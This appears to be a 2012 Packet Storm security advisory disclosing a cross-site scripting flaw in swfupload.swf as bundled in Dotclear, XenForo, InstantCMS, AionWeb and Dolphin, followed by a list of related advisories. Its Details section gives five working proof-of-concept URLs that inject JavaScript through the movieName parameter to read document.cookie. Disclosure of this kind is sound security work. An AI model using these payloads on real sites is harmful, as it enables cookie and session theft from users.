Lucene search
MustLivePACKETSTORM:118059HistoryNov 13, 2012 - 12:00 a.m.
SWF Upload Cross Site Scripting
2012-11-1300:00:00
MustLive
packetstormsecurity.com
589
0.034 Low
EPSS
Percentile
90.4%
`Hello list!
I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in WordPress
(CVE-2012-3414) and that this hole is available in many web applications.
In previous letter I've wrote the information about different versions of
this swf-file (with different names) and all versions of WordPress, which
contain any of these swf-files. And here is information about Dotclear,
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications
which are bundled with swfupload.swf.
-------------------------
Affected products:
-------------------------
Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin. There is no information that they have fixed this vulnerability in
their software (at that this vulnerability was fixed in WordPress 3.3.2 at
20.04.2012).
Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions
(already at 19.06.2012).
The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.
----------
Details:
----------
XSS (WASC-08):
Dotclear:
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
XenForo:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
InstantCMS:
http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
AionWeb:
http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Dolphin:
http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Swfupload is used in WordPress, plugins for WP and in other web
applications. There are many web applications with it, not as many as those
which are using JW Player (http://securityvulns.com/docs28176.html) and JW
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in
them I've disclosed earlier), but still a lot of.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
Related
seebug
seebug
Turbomail้ฎไปถ็ณป็ปXSS-1
2014-12-24 00:00:00
cve
cve
zdt
zdt
Dotclear XSS Vulnerabilities
2013-04-14 00:00:00
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
2014-01-23 00:00:00
packetstorm
packetstorm
WordPress 3.3.1 swfupload.swf Cross Site Scripting
2012-11-09 00:00:00
Dotclear 2.4.4 Cross Site Scripting / Content Spoofing
2013-04-13 00:00:00
WordPress E-Commerce 3.8.9.5 File Upload / XSS / CSRF / Code Execution
2014-01-24 00:00:00
threatpost
threatpost
Issue with SWFUploader Could Lead to XSS Vulnerabilities, Content Spoofing
2013-03-12 19:10:36
Yahoo Mail Breach Linked to Old WordPress Vulnerability
2013-02-01 03:42:54
securityvulns
securityvulns
CS and XSS vulnerabilities in SWFUpload
2013-03-11 00:00:00
XSS vulnerability in swfupload in WordPress
2012-11-18 00:00:00
XSS and CS vulnerabilities in Dotclear
2013-05-06 00:00:00
openvas
openvas
FreeBSD Ports: typo3
2012-08-10 00:00:00
TYPO3 SWFUpload movieName Cross Site Scripting Vulnerability
2014-01-02 00:00:00
prion
prion
Cross site scripting
2013-07-19 14:36:00
Cross site scripting
2012-04-21 23:55:00
Design/Logic Flaw
2022-06-30 13:15:00
typo3
typo3
Cross-Site Scripting Vulnerability in TYPO3 Core
2012-07-04 00:00:00
patchstack
patchstack
WordPress SWFUpload Plugin <= 2.2.0.1 - XSS #1
2012-06-14 00:00:00
ubuntucve
ubuntucve
CVE-2012-3414
2013-07-19 00:00:00
CVE-2012-2399
2012-04-21 00:00:00
debiancve
debiancve
CVE-2012-3414
2013-07-19 14:36:00
CVE-2012-2399
2012-04-21 23:55:00
nessus
nessus
WordPress < 3.3.2 Multiple Vulnerabilities
2012-05-09 00:00:00